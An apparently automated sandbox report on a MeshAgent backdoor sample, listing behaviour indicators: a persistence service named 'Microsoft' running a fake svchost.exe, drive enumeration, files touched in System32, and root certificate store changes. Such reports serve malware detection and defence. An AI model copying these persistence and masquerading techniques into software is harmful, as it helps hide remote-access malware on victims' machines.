Malware Analysis Report

2024-10-23 20:15

Sample ID 241016-paebkayckf
Target 2024-10-16_5bfa176d4d484262d8762d97bcd2b784_snatch
SHA256 54eb6f4d6682a9f61182fef1b6162019fd205710b14fee3719bce58ba9d3bcc6
Tags
meshagent backdoor discovery execution persistence rat trojan upx
score
10/10

Table of Contents

Analysis Overview

MITRE ATT&CK

Enterprise Matrix V15

Analysis: static1

Detonation Overview

Signatures

Analysis: behavioral2

Detonation Overview

Command Line

Signatures

Processes

Network

Files

Analysis: behavioral1

Detonation Overview

Command Line

Signatures

Processes

Network

Files

Analysis Overview

score
10/10

SHA256

54eb6f4d6682a9f61182fef1b6162019fd205710b14fee3719bce58ba9d3bcc6

Threat Level: Known bad

The file 2024-10-16_5bfa176d4d484262d8762d97bcd2b784_snatch was found to be: Known bad.

Malicious Activity Summary

meshagent backdoor discovery execution persistence rat trojan upx

MeshAgent

Detects MeshAgent payload

Sets service image path in registry

Command and Scripting Interpreter: PowerShell

Blocklisted process makes network request

Command and Scripting Interpreter: PowerShell

Loads dropped DLL

Executes dropped EXE

Enumerates connected drives

Checks installed software on the system

UPX packed file

Drops file in System32 directory

System Location Discovery: System Language Discovery

Unsigned PE

Suspicious use of AdjustPrivilegeToken

Suspicious use of FindShellTrayWindow

Suspicious use of WriteProcessMemory

Suspicious behavior: GetForegroundWindowSpam

Suspicious behavior: CmdExeWriteProcessMemorySpam

Suspicious behavior: EnumeratesProcesses

Modifies data under HKEY_USERS

Modifies system certificate store

MITRE ATT&CK

Analysis: static1

Detonation Overview

Reported

2024-10-16 12:07

Signatures

UPX packed file

upx
Description Indicator Process Target
N/A N/A N/A N/A

Unsigned PE

Description Indicator Process Target
N/A N/A N/A N/A
N/A N/A N/A N/A

Analysis: behavioral2

Detonation Overview

Submitted

2024-10-16 12:07

Reported

2024-10-16 12:10

Platform

win10v2004-20241007-en

Max time kernel

147s

Max time network

154s

Command Line

"C:\Users\Admin\AppData\Local\Temp\2024-10-16_5bfa176d4d484262d8762d97bcd2b784_snatch.exe"

Signatures

Detects MeshAgent payload

Description Indicator Process Target
N/A N/A N/A N/A

MeshAgent

rat trojan backdoor meshagent

Sets service image path in registry

persistence
Description Indicator Process Target
Set value (str) \REGISTRY\MACHINE\SYSTEM\ControlSet001\Services\Microsoft\ImagePath = "\"C:\\Users\\Admin\\AppData\\Local\\svchost\\svchost.exe\" --meshServiceName=\"Microsoft\"" C:\Users\Admin\AppData\Local\svchost\svchost.exe N/A

Loads dropped DLL

Description Indicator Process Target
N/A N/A C:\Windows\syswow64\MsiExec.exe N/A
N/A N/A C:\Windows\syswow64\MsiExec.exe N/A

Checks installed software on the system

discovery

Enumerates connected drives

Description Indicator Process Target
File opened (read-only) \??\K: C:\Windows\SysWOW64\msiexec.exe N/A
File opened (read-only) \??\N: C:\Windows\SysWOW64\msiexec.exe N/A
File opened (read-only) \??\P: C:\Windows\SysWOW64\msiexec.exe N/A
File opened (read-only) \??\Q: C:\Windows\SysWOW64\msiexec.exe N/A
File opened (read-only) \??\T: C:\Windows\SysWOW64\msiexec.exe N/A
File opened (read-only) \??\V: C:\Windows\SysWOW64\msiexec.exe N/A
File opened (read-only) \??\P: C:\Windows\system32\msiexec.exe N/A
File opened (read-only) \??\Z: C:\Windows\system32\msiexec.exe N/A
File opened (read-only) \??\I: C:\Windows\SysWOW64\msiexec.exe N/A
File opened (read-only) \??\L: C:\Windows\SysWOW64\msiexec.exe N/A
File opened (read-only) \??\O: C:\Windows\SysWOW64\msiexec.exe N/A
File opened (read-only) \??\Y: C:\Windows\SysWOW64\msiexec.exe N/A
File opened (read-only) \??\W: C:\Windows\system32\msiexec.exe N/A
File opened (read-only) \??\A: C:\Windows\SysWOW64\msiexec.exe N/A
File opened (read-only) \??\G: C:\Windows\SysWOW64\msiexec.exe N/A
File opened (read-only) \??\S: C:\Windows\SysWOW64\msiexec.exe N/A
File opened (read-only) \??\B: C:\Windows\system32\msiexec.exe N/A
File opened (read-only) \??\K: C:\Windows\system32\msiexec.exe N/A
File opened (read-only) \??\N: C:\Windows\system32\msiexec.exe N/A
File opened (read-only) \??\Z: C:\Windows\SysWOW64\msiexec.exe N/A
File opened (read-only) \??\E: C:\Windows\system32\msiexec.exe N/A
File opened (read-only) \??\H: C:\Windows\system32\msiexec.exe N/A
File opened (read-only) \??\R: C:\Windows\system32\msiexec.exe N/A
File opened (read-only) \??\J: C:\Windows\SysWOW64\msiexec.exe N/A
File opened (read-only) \??\X: C:\Windows\SysWOW64\msiexec.exe N/A
File opened (read-only) \??\O: C:\Windows\system32\msiexec.exe N/A
File opened (read-only) \??\U: C:\Windows\system32\msiexec.exe N/A
File opened (read-only) \??\E: C:\Windows\SysWOW64\msiexec.exe N/A
File opened (read-only) \??\R: C:\Windows\SysWOW64\msiexec.exe N/A
File opened (read-only) \??\W: C:\Windows\SysWOW64\msiexec.exe N/A
File opened (read-only) \??\A: C:\Windows\system32\msiexec.exe N/A
File opened (read-only) \??\I: C:\Windows\system32\msiexec.exe N/A
File opened (read-only) \??\J: C:\Windows\system32\msiexec.exe N/A
File opened (read-only) \??\M: C:\Windows\system32\msiexec.exe N/A
File opened (read-only) \??\Q: C:\Windows\system32\msiexec.exe N/A
File opened (read-only) \??\S: C:\Windows\system32\msiexec.exe N/A
File opened (read-only) \??\X: C:\Windows\system32\msiexec.exe N/A
File opened (read-only) \??\H: C:\Windows\SysWOW64\msiexec.exe N/A
File opened (read-only) \??\M: C:\Windows\SysWOW64\msiexec.exe N/A
File opened (read-only) \??\U: C:\Windows\SysWOW64\msiexec.exe N/A
File opened (read-only) \??\G: C:\Windows\system32\msiexec.exe N/A
File opened (read-only) \??\V: C:\Windows\system32\msiexec.exe N/A
File opened (read-only) \??\B: C:\Windows\SysWOW64\msiexec.exe N/A
File opened (read-only) \??\L: C:\Windows\system32\msiexec.exe N/A
File opened (read-only) \??\T: C:\Windows\system32\msiexec.exe N/A
File opened (read-only) \??\Y: C:\Windows\system32\msiexec.exe N/A

Drops file in System32 directory

Description Indicator Process Target
File opened for modification C:\Windows\System32\dll\ncrypt.pdb C:\Users\Admin\AppData\Local\svchost\svchost.exe N/A
File opened for modification C:\Windows\System32\dbgcore.pdb C:\Users\Admin\AppData\Local\svchost\svchost.exe N/A
File created C:\Windows\system32\config\systemprofile\AppData\Roaming\Microsoft\SystemCertificates\My\Certificates\F7713E631F25CA8BBF6B97CBD952A47F09273459 C:\Users\Admin\AppData\Local\svchost\svchost.exe N/A
File opened for modification C:\Windows\system32\config\systemprofile\AppData\Roaming\Microsoft\SystemCertificates\My\Keys C:\Users\Admin\AppData\Local\svchost\svchost.exe N/A
File opened for modification C:\Windows\System32\symbols\DLL\kernel32.pdb C:\Users\Admin\AppData\Local\svchost\svchost.exe N/A
File opened for modification C:\Windows\System32\symbols\dll\kernelbase.pdb C:\Users\Admin\AppData\Local\svchost\svchost.exe N/A
File opened for modification C:\Windows\System32\dll\ws2_32.pdb C:\Users\Admin\AppData\Local\svchost\svchost.exe N/A
File opened for modification C:\Windows\System32\dll\shell32.pdb C:\Users\Admin\AppData\Local\svchost\svchost.exe N/A
File opened for modification C:\Windows\System32\dll\ole32.pdb C:\Users\Admin\AppData\Local\svchost\svchost.exe N/A
File opened for modification C:\Windows\System32\combase.pdb C:\Users\Admin\AppData\Local\svchost\svchost.exe N/A
File opened for modification C:\Windows\System32\bcryptprimitives.pdb C:\Users\Admin\AppData\Local\svchost\svchost.exe N/A
File opened for modification C:\Windows\System32\gdi32.pdb C:\Users\Admin\AppData\Local\svchost\svchost.exe N/A
File opened for modification C:\Windows\System32\dll\msvcp_win.pdb C:\Users\Admin\AppData\Local\svchost\svchost.exe N/A
File opened for modification C:\Windows\System32\dll\ntasn1.pdb C:\Users\Admin\AppData\Local\svchost\svchost.exe N/A
File opened for modification C:\Windows\System32\dll\shcore.pdb C:\Users\Admin\AppData\Local\svchost\svchost.exe N/A
File opened for modification C:\Windows\system32\config\systemprofile\AppData\Roaming\Microsoft\SystemCertificates\My\Certificates\F7713E631F25CA8BBF6B97CBD952A47F09273459 C:\Users\Admin\AppData\Local\svchost\svchost.exe N/A
File opened for modification C:\Windows\System32\dll\kernelbase.pdb C:\Users\Admin\AppData\Local\svchost\svchost.exe N/A
File opened for modification C:\Windows\System32\symbols\dll\gdi32full.pdb C:\Users\Admin\AppData\Local\svchost\svchost.exe N/A
File opened for modification C:\Windows\System32\ole32.pdb C:\Users\Admin\AppData\Local\svchost\svchost.exe N/A
File opened for modification C:\Windows\System32\dbghelp.pdb C:\Users\Admin\AppData\Local\svchost\svchost.exe N/A
File opened for modification C:\Windows\System32\symbols\DLL\iphlpapi.pdb C:\Users\Admin\AppData\Local\svchost\svchost.exe N/A
File opened for modification C:\Windows\System32\dll\Kernel.Appcore.pdb C:\Users\Admin\AppData\Local\svchost\svchost.exe N/A
File opened for modification C:\Windows\System32\shcore.pdb C:\Users\Admin\AppData\Local\svchost\svchost.exe N/A
File created C:\Windows\system32\config\systemprofile\AppData\Roaming\Microsoft\SystemCertificates\My\Keys\14CB153A7AEB0D87578113CA83DDFCF20C1BC98D C:\Users\Admin\AppData\Local\svchost\svchost.exe N/A
File opened for modification C:\Windows\System32\dll\user32.pdb C:\Users\Admin\AppData\Local\svchost\svchost.exe N/A
File opened for modification C:\Windows\System32\symbols\dll\gdi32.pdb C:\Users\Admin\AppData\Local\svchost\svchost.exe N/A
File opened for modification C:\Windows\System32\DLL\iphlpapi.pdb C:\Users\Admin\AppData\Local\svchost\svchost.exe N/A
File opened for modification C:\Windows\System32\symbols\dll\ncrypt.pdb C:\Users\Admin\AppData\Local\svchost\svchost.exe N/A
File opened for modification C:\Windows\System32\ntasn1.pdb C:\Users\Admin\AppData\Local\svchost\svchost.exe N/A
File opened for modification C:\Windows\System32\Kernel.Appcore.pdb C:\Users\Admin\AppData\Local\svchost\svchost.exe N/A
File opened for modification C:\Windows\System32\MeshService64.pdb C:\Users\Admin\AppData\Local\svchost\svchost.exe N/A
File opened for modification C:\Windows\System32\dll\ntdll.pdb C:\Users\Admin\AppData\Local\svchost\svchost.exe N/A
File opened for modification C:\Windows\System32\symbols\dll\ws2_32.pdb C:\Users\Admin\AppData\Local\svchost\svchost.exe N/A
File opened for modification C:\Windows\System32\symbols\dll\crypt32.pdb C:\Users\Admin\AppData\Local\svchost\svchost.exe N/A
File opened for modification C:\Windows\System32\dll\ucrtbase.pdb C:\Users\Admin\AppData\Local\svchost\svchost.exe N/A
File opened for modification C:\Windows\System32\msvcrt.pdb C:\Users\Admin\AppData\Local\svchost\svchost.exe N/A
File opened for modification C:\Windows\System32\iphlpapi.pdb C:\Users\Admin\AppData\Local\svchost\svchost.exe N/A
File opened for modification C:\Windows\System32\symbols\dll\shcore.pdb C:\Users\Admin\AppData\Local\svchost\svchost.exe N/A
File opened for modification C:\Windows\System32\kernel32.pdb C:\Users\Admin\AppData\Local\svchost\svchost.exe N/A
File opened for modification C:\Windows\System32\dll\crypt32.pdb C:\Users\Admin\AppData\Local\svchost\svchost.exe N/A
File opened for modification C:\Windows\System32\msvcp_win.pdb C:\Users\Admin\AppData\Local\svchost\svchost.exe N/A
File opened for modification C:\Windows\System32\dll\msvcrt.pdb C:\Users\Admin\AppData\Local\svchost\svchost.exe N/A
File opened for modification C:\Windows\System32\symbols\dll\advapi32.pdb C:\Users\Admin\AppData\Local\svchost\svchost.exe N/A
File opened for modification C:\Windows\System32\symbols\dll\ntdll.pdb C:\Users\Admin\AppData\Local\svchost\svchost.exe N/A
File opened for modification C:\Windows\System32\symbols\dll\user32.pdb C:\Users\Admin\AppData\Local\svchost\svchost.exe N/A
File opened for modification C:\Windows\System32\comctl32.pdb C:\Users\Admin\AppData\Local\svchost\svchost.exe N/A
File opened for modification C:\Windows\System32\symbols\DLL\dbgcore.pdb C:\Users\Admin\AppData\Local\svchost\svchost.exe N/A
File opened for modification C:\Windows\System32\DLL\kernel32.pdb C:\Users\Admin\AppData\Local\svchost\svchost.exe N/A
File opened for modification C:\Windows\System32\symbols\dll\rpcrt4.pdb C:\Users\Admin\AppData\Local\svchost\svchost.exe N/A
File opened for modification C:\Windows\System32\ucrtbase.pdb C:\Users\Admin\AppData\Local\svchost\svchost.exe N/A
File opened for modification C:\Windows\System32\gdi32full.pdb C:\Users\Admin\AppData\Local\svchost\svchost.exe N/A
File opened for modification C:\Windows\System32\shell32.pdb C:\Users\Admin\AppData\Local\svchost\svchost.exe N/A
File opened for modification C:\Windows\System32\symbols\dll\comctl32.pdb C:\Users\Admin\AppData\Local\svchost\svchost.exe N/A
File opened for modification C:\Windows\System32\DLL\bcrypt.pdb C:\Users\Admin\AppData\Local\svchost\svchost.exe N/A
File opened for modification C:\Windows\System32\symbols\dll\bcryptprimitives.pdb C:\Users\Admin\AppData\Local\svchost\svchost.exe N/A
File created C:\Windows\system32\config\systemprofile\AppData\Roaming\Microsoft\SystemCertificates\My\Keys\74749DACF9E162F61B869F12098860435E149F59 C:\Users\Admin\AppData\Local\svchost\svchost.exe N/A
File opened for modification C:\Windows\System32\exe\MeshService64.pdb C:\Users\Admin\AppData\Local\svchost\svchost.exe N/A
File opened for modification C:\Windows\System32\symbols\exe\MeshService64.pdb C:\Users\Admin\AppData\Local\svchost\svchost.exe N/A
File opened for modification C:\Windows\System32\dll\rpcrt4.pdb C:\Users\Admin\AppData\Local\svchost\svchost.exe N/A
File opened for modification C:\Windows\System32\symbols\dll\win32u.pdb C:\Users\Admin\AppData\Local\svchost\svchost.exe N/A
File opened for modification C:\Windows\System32\symbols\dll\msvcrt.pdb C:\Users\Admin\AppData\Local\svchost\svchost.exe N/A
File opened for modification C:\Windows\System32\symbols\dll\sechost.pdb C:\Users\Admin\AppData\Local\svchost\svchost.exe N/A
File opened for modification C:\Windows\System32\dll\comctl32.pdb C:\Users\Admin\AppData\Local\svchost\svchost.exe N/A
File opened for modification C:\Windows\System32\gdiplus.pdb C:\Users\Admin\AppData\Local\svchost\svchost.exe N/A

UPX packed file

upx
Description Indicator Process Target
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A

System Location Discovery: System Language Discovery

discovery
Description Indicator Process Target
Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language C:\Users\Admin\AppData\Local\Temp\install.exe N/A
Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language C:\Windows\SysWOW64\msiexec.exe N/A
Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language C:\Windows\syswow64\MsiExec.exe N/A

Modifies data under HKEY_USERS

Description Indicator Process Target
Key created \REGISTRY\USER\.DEFAULT\Software\Policies\Microsoft\SystemCertificates\Disallowed\Certificates C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe N/A
Key created \REGISTRY\USER\.DEFAULT\Software\Policies\Microsoft\SystemCertificates\Disallowed\CTLs C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe N/A
Key created \REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\trust C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe N/A
Key created \REGISTRY\USER\.DEFAULT\Software\Policies\Microsoft\SystemCertificates\trust\CTLs C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe N/A
Key created \REGISTRY\USER\S-1-5-19\Software\Microsoft\Cryptography\TPM\Telemetry C:\Users\Admin\AppData\Local\svchost\svchost.exe N/A
Key created \REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\Root\CRLs C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe N/A
Key created \REGISTRY\USER\.DEFAULT\Software\Policies\Microsoft\SystemCertificates\TrustedPeople\CTLs C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe N/A
Key created \REGISTRY\USER\.DEFAULT\Software\Policies\Microsoft\SystemCertificates\trust\Certificates C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe N/A
Key created \REGISTRY\USER\.DEFAULT\Software\Policies\Microsoft\SystemCertificates\trust\CRLs C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe N/A
Key created \REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\CA C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe N/A
Key created \REGISTRY\USER\.DEFAULT\Software\Policies\Microsoft\SystemCertificates\Disallowed C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe N/A
Key created \REGISTRY\USER\.DEFAULT\Software\Policies\Microsoft\SystemCertificates\TrustedPeople\CRLs C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe N/A
Key created \REGISTRY\USER\.DEFAULT\Software\Policies\Microsoft\SystemCertificates\CA\CTLs C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe N/A
Key created \REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\Disallowed\Certificates C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe N/A
Key created \REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\Disallowed\CRLs C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe N/A
Key created \REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\SmartCardRoot C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe N/A
Key created \REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\SmartCardRoot\Certificates C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe N/A
Key created \REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\CA\CRLs C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe N/A
Key created \REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\CA\CTLs C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe N/A
Key created \REGISTRY\USER\.DEFAULT\Software\Policies\Microsoft\SystemCertificates\CA\CRLs C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe N/A
Key created \REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\trust\CRLs C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe N/A
Key created \REGISTRY\USER\.DEFAULT\Software\Microsoft\Windows\CurrentVersion\WinTrust\Trust Providers\Software Publishing C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe N/A
Key created \REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\Disallowed\CTLs C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe N/A
Key created \REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\Root\Certificates C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe N/A
Key created \REGISTRY\USER\.DEFAULT\Software\Policies\Microsoft\SystemCertificates\TrustedPeople C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe N/A
Key created \REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\trust\Certificates C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe N/A
Key created \REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\CA\Certificates C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe N/A
Key created \REGISTRY\USER\.DEFAULT\Software\Policies\Microsoft\SystemCertificates\CA C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe N/A
Key created \REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\Disallowed C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe N/A
Set value (int) \REGISTRY\USER\S-1-5-19\SOFTWARE\Microsoft\Cryptography\TPM\Telemetry\TraceTimeLast = "133735541030858334" C:\Users\Admin\AppData\Local\svchost\svchost.exe N/A
Key created \REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\Root C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe N/A
Key created \REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\TrustedPeople\CRLs C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe N/A
Key created \REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\TrustedPeople\CTLs C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe N/A
Key created \REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\trust\CTLs C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe N/A
Key created \REGISTRY\USER\.DEFAULT\Software\Policies\Microsoft\SystemCertificates\trust C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe N/A
Key created \REGISTRY\USER\.DEFAULT\Software\Policies\Microsoft\SystemCertificates\Disallowed\CRLs C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe N/A
Key created \REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\Root\CTLs C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe N/A
Key created \REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\SmartCardRoot\CTLs C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe N/A
Key created \REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\TrustedPeople\Certificates C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe N/A
Key created \REGISTRY\USER\.DEFAULT\Software\Policies\Microsoft\SystemCertificates\TrustedPeople\Certificates C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe N/A
Key created \REGISTRY\USER\.DEFAULT\Software\Policies\Microsoft\SystemCertificates\CA\Certificates C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe N/A
Key created \REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\SmartCardRoot\CRLs C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe N/A
Key created \REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\TrustedPeople C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe N/A

Modifies system certificate store

evasion spyware trojan
Description Indicator Process Target
Set value (data) \REGISTRY\MACHINE\SOFTWARE\Microsoft\SystemCertificates\AuthRoot\Certificates\D1EB23A46D17D68FD92564C2F1F1601764D8E349\Blob = 1900000001000000100000002aa1c05e2ae606f198c2c5e937c97aa2030000000100000014000000d1eb23a46d17d68fd92564c2f1f1601764d8e3491d00000001000000100000002e0d6875874a44c820912e85e964cfdb140000000100000014000000a0110a233e96f107ece2af29ef82a57fd030a4b40b000000010000001c0000005300650063007400690067006f002000280041004100410029000000620000000100000020000000d7a7a0fb5d7e2731d771e9484ebcdef71d5f0c3e0a2948782bc83ee0ea699ef453000000010000004300000030413022060c2b06010401b231010201050130123010060a2b0601040182373c0101030200c0301b060567810c010330123010060a2b0601040182373c0101030200c0090000000100000054000000305206082b0601050507030206082b06010505070303060a2b0601040182370a030406082b0601050507030406082b0601050507030606082b0601050507030706082b0601050507030106082b060105050703080f00000001000000140000003e8e6487f8fd27d322a269a71edaac5d57811286200000000100000036040000308204323082031aa003020102020101300d06092a864886f70d0101050500307b310b3009060355040613024742311b301906035504080c1247726561746572204d616e636865737465723110300e06035504070c0753616c666f7264311a3018060355040a0c11436f6d6f646f204341204c696d697465643121301f06035504030c18414141204365727469666963617465205365727669636573301e170d3034303130313030303030305a170d3238313233313233353935395a307b310b3009060355040613024742311b301906035504080c1247726561746572204d616e636865737465723110300e06035504070c0753616c666f7264311a3018060355040a0c11436f6d6f646f204341204c696d697465643121301f06035504030c1841414120436572746966696361746520536572766963657330820122300d06092a864886f70d01010105000382010f003082010a0282010100be409df46ee1ea76871c4d45448ebe46c883069dc12afe181f8ee402faf3ab5d508a16310b9a06d0c57022cd492d5463ccb66e68460b53eacb4c24c0bc724eeaf115aef4549a120ac37ab23360e2da8955f32258f3dedccfef8386a28c944f9f68f29890468427c776bfe3cc352c8b5e07646582c048b0a891f9619f762050a891c766b5eb78620356f08a1a13ea31a31ea099fd38f6f62732586f07f56bb8fb142bafb7aaccd6635f738cda0599a838a8cb17783651ace99ef4783a8dcf0fd942e2980cab2f9f0e01deef9f9949f12ddfac744d1b98b547c5e529d1f99018c7629cbe83c7267b3e8a25c7c0dd9de6356810209d8fd8ded2c3849c0d5ee82fc90203010001a381c03081bd301d0603551d0e04160414a0110a233e96f107ece2af29ef82a57fd030a4b4300e0603551d0f0101ff040403020106300f0603551d130101ff040530030101ff307b0603551d1f047430723038a036a0348632687474703a2f2f63726c2e636f6d6f646f63612e636f6d2f414141436572746966696361746553657276696365732e63726c3036a034a0328630687474703a2f2f63726c2e636f6d6f646f2e6e65742f414141436572746966696361746553657276696365732e63726c300d06092a864886f70d010105050003820101000856fc02f09be8ffa4fad67bc64480ce4fc4c5f60058cca6b6bc1449680476e8e6ee5dec020f60d68d50184f264e01e3e6b0a5eebfbc745441bffdfc12b8c74f5af48960057f60b7054af3f6f1c2bfc4b97486b62d7d6bccd2f346dd2fc6e06ac3c334032c7d96dd5ac20ea70a99c1058bab0c2ff35c3acf6c37550987de53406c58effcb6ab656e04f61bdc3ce05a15c69ed9f15948302165036cece92173ec9b03a1e037ada015188ffaba02cea72ca910132cd4e50826ab229760f8905e74d4a29a53bdf2a968e0a26ec2d76cb1a30f9ebfeb68e756f2aef2e32b383a0981b56b85d7be2ded3f1ab7b263e2f5622c82d46a004150f139839f95e93696986e C:\Users\Admin\AppData\Local\Temp\2024-10-16_5bfa176d4d484262d8762d97bcd2b784_snatch.exe N/A
Key created \REGISTRY\MACHINE\SOFTWARE\Microsoft\SystemCertificates\AuthRoot\Certificates\D1EB23A46D17D68FD92564C2F1F1601764D8E349 C:\Users\Admin\AppData\Local\Temp\2024-10-16_5bfa176d4d484262d8762d97bcd2b784_snatch.exe N/A
Set value (data) \REGISTRY\MACHINE\SOFTWARE\Microsoft\SystemCertificates\AuthRoot\Certificates\D1EB23A46D17D68FD92564C2F1F1601764D8E349\Blob = 0f00000001000000140000003e8e6487f8fd27d322a269a71edaac5d57811286090000000100000054000000305206082b0601050507030206082b06010505070303060a2b0601040182370a030406082b0601050507030406082b0601050507030606082b0601050507030706082b0601050507030106082b0601050507030853000000010000004300000030413022060c2b06010401b231010201050130123010060a2b0601040182373c0101030200c0301b060567810c010330123010060a2b0601040182373c0101030200c0620000000100000020000000d7a7a0fb5d7e2731d771e9484ebcdef71d5f0c3e0a2948782bc83ee0ea699ef40b000000010000001c0000005300650063007400690067006f002000280041004100410029000000140000000100000014000000a0110a233e96f107ece2af29ef82a57fd030a4b41d00000001000000100000002e0d6875874a44c820912e85e964cfdb030000000100000014000000d1eb23a46d17d68fd92564c2f1f1601764d8e349200000000100000036040000308204323082031aa003020102020101300d06092a864886f70d0101050500307b310b3009060355040613024742311b301906035504080c1247726561746572204d616e636865737465723110300e06035504070c0753616c666f7264311a3018060355040a0c11436f6d6f646f204341204c696d697465643121301f06035504030c18414141204365727469666963617465205365727669636573301e170d3034303130313030303030305a170d3238313233313233353935395a307b310b3009060355040613024742311b301906035504080c1247726561746572204d616e636865737465723110300e06035504070c0753616c666f7264311a3018060355040a0c11436f6d6f646f204341204c696d697465643121301f06035504030c1841414120436572746966696361746520536572766963657330820122300d06092a864886f70d01010105000382010f003082010a0282010100be409df46ee1ea76871c4d45448ebe46c883069dc12afe181f8ee402faf3ab5d508a16310b9a06d0c57022cd492d5463ccb66e68460b53eacb4c24c0bc724eeaf115aef4549a120ac37ab23360e2da8955f32258f3dedccfef8386a28c944f9f68f29890468427c776bfe3cc352c8b5e07646582c048b0a891f9619f762050a891c766b5eb78620356f08a1a13ea31a31ea099fd38f6f62732586f07f56bb8fb142bafb7aaccd6635f738cda0599a838a8cb17783651ace99ef4783a8dcf0fd942e2980cab2f9f0e01deef9f9949f12ddfac744d1b98b547c5e529d1f99018c7629cbe83c7267b3e8a25c7c0dd9de6356810209d8fd8ded2c3849c0d5ee82fc90203010001a381c03081bd301d0603551d0e04160414a0110a233e96f107ece2af29ef82a57fd030a4b4300e0603551d0f0101ff040403020106300f0603551d130101ff040530030101ff307b0603551d1f047430723038a036a0348632687474703a2f2f63726c2e636f6d6f646f63612e636f6d2f414141436572746966696361746553657276696365732e63726c3036a034a0328630687474703a2f2f63726c2e636f6d6f646f2e6e65742f414141436572746966696361746553657276696365732e63726c300d06092a864886f70d010105050003820101000856fc02f09be8ffa4fad67bc64480ce4fc4c5f60058cca6b6bc1449680476e8e6ee5dec020f60d68d50184f264e01e3e6b0a5eebfbc745441bffdfc12b8c74f5af48960057f60b7054af3f6f1c2bfc4b97486b62d7d6bccd2f346dd2fc6e06ac3c334032c7d96dd5ac20ea70a99c1058bab0c2ff35c3acf6c37550987de53406c58effcb6ab656e04f61bdc3ce05a15c69ed9f15948302165036cece92173ec9b03a1e037ada015188ffaba02cea72ca910132cd4e50826ab229760f8905e74d4a29a53bdf2a968e0a26ec2d76cb1a30f9ebfeb68e756f2aef2e32b383a0981b56b85d7be2ded3f1ab7b263e2f5622c82d46a004150f139839f95e93696986e C:\Users\Admin\AppData\Local\Temp\2024-10-16_5bfa176d4d484262d8762d97bcd2b784_snatch.exe N/A
Key created \REGISTRY\MACHINE\SOFTWARE\Microsoft\SystemCertificates\ROOT\Certificates\CABD2A79A1076A31F21D253635CB039D4329A5E8 C:\Users\Admin\AppData\Local\Temp\2024-10-16_5bfa176d4d484262d8762d97bcd2b784_snatch.exe N/A
